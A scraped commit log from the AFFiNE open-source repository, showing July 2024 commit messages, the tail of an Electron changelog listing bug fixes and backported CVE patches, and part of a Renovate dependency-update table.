- Fixed an issue where `fetch`-dependent interfaces could be missing in Web Workers with `nodeIntegrationInWorker` enabled. [#​42596](https://togithub.com/electron/electron/pull/42596 ) <span style="font-size:small;">(Also in [31](https://togithub.com/electron/electron/pull/42597 ), [32](https://togithub.com/electron/electron/pull/42595 ))</span>
- Fixed an issue where `navigator.mediaDevices.enumerateDevices` could return broken results in some cases after calling `session.setPermissionCheckHandler`. [#​42807](https://togithub.com/electron/electron/pull/42807 ) <span style="font-size:small;">(Also in [31](https://togithub.com/electron/electron/pull/42809 ), [32](https://togithub.com/electron/electron/pull/42808 ))</span>
- Fixed an issue where control could fail to return properly after saving a dialog using showOpenDialogSync on Linux. [#​42676](https://togithub.com/electron/electron/pull/42676 ) <span style="font-size:small;">(Also in [29](https://togithub.com/electron/electron/pull/42679 ), [31](https://togithub.com/electron/electron/pull/42678 ), [32](https://togithub.com/electron/electron/pull/42677 ))</span>
- Fixed an issue where the user-specified default path did not work in some circumstances when using Linux dialogs. [#​42687](https://togithub.com/electron/electron/pull/42687 ) <span style="font-size:small;">(Also in [31](https://togithub.com/electron/electron/pull/42685 ), [32](https://togithub.com/electron/electron/pull/42680 ))</span>
- Fixed potentially incorrect exit code in UtilityProcess. [#​42395](https://togithub.com/electron/electron/pull/42395 ) <span style="font-size:small;">(Also in [29](https://togithub.com/electron/electron/pull/42396 ), [31](https://togithub.com/electron/electron/pull/42397 ))</span>
##### Other Changes
- Security: backported fix for CVE-2024-5493. [#​42590](https://togithub.com/electron/electron/pull/42590 )
- Security: backported fix for CVE-2024-5831.
- Security: backported fix for CVE-2024-5832. [#​42602](https://togithub.com/electron/electron/pull/42602 )
- Security: backported fix for CVE-2024-6100.
- Security: backported fix for CVE-2024-6101.
- Security: backported fix for CVE-2024-6103. [#​42617](https://togithub.com/electron/electron/pull/42617 )
- Security: backported fix for CVE-2024-6291.
- Security: backported fix for CVE-2024-6293.
- Security: backported fix for CVE-2024-6290.
- Security: backported fix for CVE-2024-6292.
- Security: backported fix for chromium:346197738. [#​42693](https://togithub.com/electron/electron/pull/42693 )
- Updated Node.js to v20.15.0. [#​42613](https://togithub.com/electron/electron/pull/42613 )
</details>
<details>
<summary>si
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://togithub.com/renovatebot/renovate/discussions ) if that's undesired.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View repository job log [here](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy40MjEuOSIsInVwZGF0ZWRJblZlciI6IjM3LjQzMS40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->
2024-07-15 08:20:22 +00:00
EYHN
063c206289
chore: bump blocksuite ( #7489 )
2024-07-15 07:58:26 +00:00
CatsJuice
242c41b440
feat(core): adjust center peek animation ( #7393 )
2024-07-15 06:36:24 +00:00
CatsJuice
7082f7ea7a
fix(core): share-button's label of shared page should be 'shared' ( #7486 )
...
close #7427
2024-07-15 06:21:22 +00:00
pengx17
15042394be
chore: expose FrameworkEvent ( #7500 )
...
fix the following ts error

2024-07-15 05:29:53 +00:00
darkskygit
e4b816f153
feat: add ping for event source ( #7493 )
2024-07-15 04:16:22 +00:00
EYHN
7103b2e594
feat(component): new dnd api ( #7467 )
2024-07-15 04:00:42 +00:00
EYHN
dca88e24fe
feat(electron): shared storage ( #7492 )
2024-07-15 03:21:08 +00:00
EYHN
0f1409756e
refactor(infra): memento use undefined ( #7491 )
2024-07-15 02:48:20 +00:00
lawvs
2f784ae539
fix: switch to file-type v19.1.0 ( #7459 )
...
The official `file-type` package has replaced the usage of node:buffer with Uint8Array. This change allows it to run safely in the browser now.
Related to https://github.com/sindresorhus/file-type/issues/578
2024-07-12 10:27:49 +00:00
donteatfriedrice
5ede985a3a
fix: increase image action time out ( #7487 )
...
Increase image action timeout from 50000ms to 120000ms.
2024-07-12 06:36:30 +00:00
forehalo
024e5500f6
feat(infra): improve orm ( #7475 )
2024-07-12 04:25:59 +00:00
EYHN
5dd7382693
refactor(core): workbench ( #7355 )
...
Merge the right sidebar logic into the workbench. this can simplify our logic.
Previously we had 3 modules
* workbench
* right-sidebar (Control sidebar open&close)
* multi-tab-sidebar (Control tabs)
Now everything is managed in Workbench.
# Behavioral changes
The sidebar button is always visible and can be opened at any time.
If there is no content to display, will be `No Selection`

Elements in the sidebar can now be defined as`unmountOnInactive=false`. Inactive sidebars are marked with `display: none` but not unmount, so the `ChatPanel` can always remain in the DOM and user input will be retained even if the sidebar is closed.
2024-07-12 04:11:05 +00:00
darkskygit
5f16cb400d
hotfix: adapt new fal response ( #7480 )
2024-07-12 03:22:04 +00:00
darkskygit
4591b3391e
chore: fix redirect for static files ( #7473 )
2024-07-11 08:25:33 +00:00
EYHN
c2f93f9512
fix(infra): failed to get status when database not ready ( #7470 )
2024-07-11 06:40:35 +00:00
CatsJuice
c850dbb2b7
refactor(core): optimize abstraction of sidebar doc tree structure ( #7455 )
2024-07-11 06:24:45 +00:00
pengx17
7a35b78772
fix: telemetry property names ( #7468 )
2024-07-11 02:35:39 +00:00
forehalo
2f441d9335
chore: clean up runtime flags and envs ( #7454 )
2024-07-11 02:05:31 +00:00
darkskygit
0739e10683
feat: adapt workflow for ppt & minimap ( #7464 )
2024-07-10 10:13:17 +00:00
Cats Juice
22187f964a
fix(core): impl ai-island animation via css transform ( #7458 )
2024-07-09 16:17:55 +08:00
doouding
cf7b026832
feat: bump bs ( #7430 )
...
## Features
## Bugfix
- https://github.com/toeverything/BlockSuite/pull/7499 @doouding
- https://github.com/toeverything/BlockSuite/pull/7491 @golok727
## Refactor
## Misc
- https://github.com/toeverything/BlockSuite/pull/7454 @CatsJuice
2024-07-09 07:56:16 +00:00
JimmFly
e6818b4f14
feat(core): add doc info modal ( #7409 )
...
close AF-1038
close AF-1039
close AF-1040
close AF-1046
A popup window has been added to facilitate viewing of this doc's info in edgeless mode and other modes.
https://github.com/toeverything/AFFiNE/assets/102217452/d7f94cb6-7e32-4ce7-8ff4-8aba1309b331
2024-07-09 07:05:20 +00:00
EYHN
aab9925aa1
feat(core): adjust search strategy ( #7447 )
2024-07-09 04:27:34 +00:00
pengx17
86218d87c2
chore: revert back electron to v30 ( #7453 )
2024-07-09 03:50:13 +00:00
forehalo
de4084495b
chore(graphql): generate new schema
2024-07-08 17:21:21 +08:00
CatsJuice
13a2562282
feat(core): believer subscription UI ( #7431 )
...
feat(core): switch ai and cloud plans position
feat(core): impl lifetime subscription ui
feat(core): adapt ui for lifetime status
feat(core): add believer card in billing page
2024-07-08 08:31:22 +00:00
darkskygit
556956ced2
feat: update ppt prompt ( #7446 )
2024-07-08 08:11:31 +00:00
darkskygit
bf6c9a5955
feat: add prompt level config ( #7445 )
2024-07-08 08:11:22 +00:00
forehalo
9ef8829ef1
feat(server): add lifetime plan flag ( #7443 )
2024-07-08 07:41:30 +00:00
forehalo
de91027852
feat(server): support lifetime subscription ( #7405 )
...
closes CLOUD-48
- [x] lifetime subscription quota
- [ ] tests
2024-07-08 07:41:26 +00:00
forehalo
7235779b02
fix(core): use uint53 as yjs client id ( #7444 )
2024-07-08 07:24:32 +00:00
LongYinan
ba356f4412
fix(native): async fn compile error ( #7435 )
2024-07-08 15:04:37 +08:00
renovate
602d932065
chore: bump up all non-major dependencies ( #7308 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence | Type | Update |
|---|---|---|---|---|---|---|---|
| [@aws-sdk/client-s3](https://togithub.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://togithub.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.592.0` -> `3.609.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.592.0/3.609.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@aws-sdk/client-s3](https://togithub.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://togithub.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.600.0` -> `3.609.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.600.0/3.609.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@fal-ai/serverless-client](https://togithub.com/fal-ai/fal-js ) ([source](https://togithub.com/fal-ai/fal-js/tree/HEAD/libs/client )) | [`^0.10.2` -> `^0.12.0`](https://renovatebot.com/diffs/npm/@fal-ai%2fserverless-client/0.10.4/0.12.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@floating-ui/dom](https://floating-ui.com ) ([source](https://togithub.com/floating-ui/floating-ui/tree/HEAD/packages/dom )) | [`1.6.5` -> `1.6.7`](https://renovatebot.com/diffs/npm/@floating-ui%2fdom/1.6.5/1.6.7 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@graphql-codegen/typescript](https://togithub.com/dotansimha/graphql-code-generator ) ([source](https://togithub.com/dotansimha/graphql-code-generator/tree/HEAD/packages/plugins/typescript/typescript )) | [`4.0.7` -> `4.0.9`](https://renovatebot.com/diffs/npm/@graphql-codegen%2ftypescript/4.0.7/4.0.9 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@graphql-codegen/typescript-operations](https://togithub.com/dotansimha/graphql-code-generator ) ([source](https://togithub.com/dotansimha/graphql-code-generator/tree/HEAD/packages/plugins/typescript/operations )) | [`4.2.1` -> `4.2.3`](https://renovatebot.com/diffs/npm/@graphql-codegen%2ftypescript-operations/4.2.1/4.2.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@hookform/resolvers](https://react-hook-form.com ) ([source](https://togithub.com/react-hook-form/resolvers )) | [`3.6.0` -> `3.9.0`](https://renovatebot.com/diffs/npm/@hookform%2fresolvers/3.6.0/3.9.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@napi-rs/cli](https://togithub.com/napi-rs/napi-rs ) | [`3.0.0-alpha.55` -> `3.0.0-alpha.56`](https://renovatebot.com/diffs/npm/@napi-rs%2fcli/3.0.0-alpha.55/3.0.0-alpha.56 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@nestjs/apollo](https://togithub.com/nestjs/graphql ) | [`12.1.0` -> `12.2.0`](https://renovatebot.com/diffs/npm/@nestjs%2fapollo/12.1.0/12.2.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@nestjs/common](https://nestjs.com ) ([source](https://togithub.com/nestjs/nest/tree/HEAD/packages/common )) | [`10.3.9` -> `10.3.10`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/10.3.9/10.3.10 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@nestjs/core](https://nestjs.com ) ([source](https://togithub.com/nestjs/nest/tree/HEAD/packages/core )) | [`10.3.9` -> `10.3.10`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/10.3.9/10.3.10 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@nestjs/graphql](https://togithub.com/nestjs/graphql ) | [`12.1.1` -> `12.2.0`](https://renovatebot.com/diffs/npm/@nestjs%2fgraphql/12.1.1/12.2.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@nestjs/platform-express](https://nestjs.com ) ([source](https://togithub.com/nestjs/nest/tree/HEAD/packages/platform-express )) | [`10.3.9` -> `10.3.10`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/10.3.9/10.3.10 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@nestjs/platform-socket.io](https://nestjs.com ) ([source](https://togithub.com/nestjs/nest/tree/HEAD/packages/platform-socket.io )) | [`10.3.9` -> `10.3.10`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/10.3.9/10.3.10 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@nestjs/schedule](https://togithub.com/nestjs/schedule ) | [`4.0.2` -> `4.1.0`](https://renovatebot.com/diffs/npm/@nestjs%2fschedule/4.0.2/4.1.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@nestjs/testing](https://nestjs.com ) ([source](https://togithub.com/nestjs/nest/tree/HEAD/packages/testing )) | [`10.3.9` -> `10.3.10`](https://renovatebot.com/diffs/npm/@nestjs%2ftesting/10.3.9/10.3.10 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@nestjs/throttler](https://togithub.com/nestjs/throttler ) | [`5.1.2` -> `5.2.0`](https://renovatebot.com/diffs/npm/@nestjs%2fthrottler/5.1.2/5.2.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@nestjs/websockets](https://togithub.com/nestjs/nest ) ([source](https://togithub.com/nestjs/nest/tree/HEAD/packages/websockets )) | [`10.3.9` -> `10.3.10`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/10.3.9/10.3.10 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@nx/vite](https://nx.dev ) ([source](https://togithub.com/nrwl/nx/tree/HEAD/packages/vite )) | [`19.2.3` -> `19.4.1`](https://renovatebot.com/diffs/npm/@nx%2fvite/19.2.3/19.4.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@opentelemetry/host-metrics](https://togithub.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/opentelemetry-host-metrics#readme ) ([source](https://togithub.com/open-telemetry/opentelemetry-js-contrib )) | [`0.35.2` -> `0.35.3`](https://renovatebot.com/diffs/npm/@opentelemetry%2fhost-metrics/0.35.2/0.35.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@opentelemetry/instrumentation-graphql](https://togithub.com/open-telemetry/opentelemetry-js-contrib/tree/main/plugins/node/opentelemetry-instrumentation-graphql#readme ) ([source](https://togithub.com/open-telemetry/opentelemetry-js-contrib )) | [`^0.41.0` -> `^0.42.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.41.0/0.42.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@opentelemetry/instrumentation-ioredis](https://togithub.com/open-telemetry/opentelemetry-js-contrib/tree/main/plugins/node/opentelemetry-instrumentation-ioredis#readme ) ([source](https://togithub.com/open-telemetry/opentelemetry-js-contrib )) | [`^0.41.0` -> `^0.42.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.41.0/0.42.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@opentelemetry/instrumentation-nestjs-core](https://togithub.com/open-telemetry/opentelemetry-js-contrib/tree/main/plugins/node/opentelemetry-instrumentation-nestjs-core#readme ) ([source](https://togithub.com/open-telemetry/opentelemetry-js-contrib )) | [`^0.38.0` -> `^0.39.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.38.0/0.39.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@opentelemetry/instrumentation-socket.io](https://togithub.com/open-telemetry/opentelemetry-js-contrib/tree/main/plugins/node/instrumentation-socket.io#readme ) ([source](https://togithub.com/open-telemetry/opentelemetry-js-contrib )) | [`^0.40.0` -> `^0.41.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.40.0/0.41.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@playwright/test](https://playwright.dev ) ([source](https://togithub.com/microsoft/playwright )) | [`1.44.1` -> `1.45.1`](https://renovatebot.com/diffs/npm/@playwright%2ftest/1.44.1/1.45.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@prisma/client](https://www.prisma.io ) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/client )) | [`5.15.1` -> `5.16.1`](https://renovatebot.com/diffs/npm/@prisma%2fclient/5.15.1/5.16.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@prisma/instrumentation](https://www.prisma.io ) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/instrumentation )) | [`5.15.1` -> `5.16.1`](https://renovatebot.com/diffs/npm/@prisma%2finstrumentation/5.15.1/5.16.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@radix-ui/react-checkbox](https://radix-ui.com/primitives ) ([source](https://togithub.com/radix-ui/primitives )) | [`1.1.0` -> `1.1.1`](https://renovatebot.com/diffs/npm/@radix-ui%2freact-checkbox/1.1.0/1.1.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@radix-ui/react-tooltip](https://radix-ui.com/primitives ) ([source](https://togithub.com/radix-ui/primitives )) | [`1.1.1` -> `1.1.2`](https://renovatebot.com/diffs/npm/@radix-ui%2freact-tooltip/1.1.1/1.1.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@sentry/esbuild-plugin](https://togithub.com/getsentry/sentry-javascript-bundler-plugins/tree/main/packages/esbuild-plugin ) ([source](https://togithub.com/getsentry/sentry-javascript-bundler-plugins )) | [`2.19.0` -> `2.20.1`](https://renovatebot.com/diffs/npm/@sentry%2fesbuild-plugin/2.19.0/2.20.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@sentry/react](https://togithub.com/getsentry/sentry-javascript/tree/master/packages/react ) ([source](https://togithub.com/getsentry/sentry-javascript )) | [`8.11.0` -> `8.15.0`](https://renovatebot.com/diffs/npm/@sentry%2freact/8.11.0/8.15.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@sentry/react](https://togithub.com/getsentry/sentry-javascript/tree/master/packages/react ) ([source](https://togithub.com/getsentry/sentry-javascript )) | [`8.11.0` -> `8.15.0`](https://renovatebot.com/diffs/npm/@sentry%2freact/8.11.0/8.15.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@sentry/webpack-plugin](https://togithub.com/getsentry/sentry-javascript-bundler-plugins/tree/main/packages/webpack-plugin ) ([source](https://togithub.com/getsentry/sentry-javascript-bundler-plugins )) | [`2.19.0` -> `2.20.1`](https://renovatebot.com/diffs/npm/@sentry%2fwebpack-plugin/2.19.0/2.20.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@storybook/addon-actions](https://togithub.com/storybookjs/storybook/tree/next/code/addons/actions ) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/actions )) | [`7.6.19` -> `7.6.20`](https://renovatebot.com/diffs/npm/@storybook%2faddon-actions/7.6.19/7.6.20 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@storybook/addon-essentials](https://togithub.com/storybookjs/storybook/tree/next/code/addons/essentials ) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/essentials )) | [`7.6.19` -> `7.6.20`](https://renovatebot.com/diffs/npm/@storybook%2faddon-essentials/7.6.19/7.6.20 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@storybook/addon-interactions](https://togithub.com/storybookjs/storybook/tree/next/code/addons/interactions ) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/interactions )) | [`7.6.19` -> `7.6.20`](https://renovatebot.com/diffs/npm/@storybook%2faddon-interactions/7.6.19/7.6.20 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@storybook/addon-links](https://togithub.com/storybookjs/storybook/tree/next/code/addons/links ) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/links )) | [`7.6.19` -> `7.6.20`](https://renovatebot.com/diffs/npm/@storybook%2faddon-links/7.6.19/7.6.20 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@storybook/addon-mdx-gfm](https://togithub.com/storybookjs/storybook/tree/next/code/addons/gfm ) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/gfm )) | [`7.6.19` -> `7.6.20`](https://renovatebot.com/diffs/npm/@storybook%2faddon-mdx-gfm/7.6.19/7.6.20 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@storybook/addon-storysource](https://togithub.com/storybookjs/storybook/tree/next/code/addons/storysource ) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/storysource )) | [`7.6.19` -> `7.6.20`](https://renovatebot.com/diffs/npm/@storybook%2faddon-storysource/7.6.19/7.6.20 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@storybook/blocks](https://togithub.com/storybookjs/storybook/tree/next/code/ui/blocks ) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/ui/blocks )) | [`7.6.19` -> `7.6.20`](https://renovatebot.com/diffs/npm/@storybook%2fblocks/7.6.19/7.6.20 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@storybook/builder-vite](https://togithub.com/storybookjs/storybook/tree/next/code/builders/builder-vite/#readme ) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/builders/builder-vite )) | [`7.6.19` -> `7.6.20`](https://renovatebot.com/diffs/npm/@storybook%2fbuilder-vite/7.6.19/7.6.20 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@storybook/react](https://togithub.com/storybookjs/storybook/tree/next/code/renderers/react ) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/renderers/react )) | [`7.6.19` -> `7.6.20`](https://renovatebot.com/diffs/npm/@storybook%2freact/7.6.19/7.6.20 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@storybook/react-vite](https://togithub.com/storybookjs/storybook/tree/next/code/frameworks/react-vite ) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/frameworks/react-vite )) | [`7.6.19` -> `7.6.20`](https://renovatebot.com/diffs/npm/@storybook%2freact-vite/7.6.19/7.6.20 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
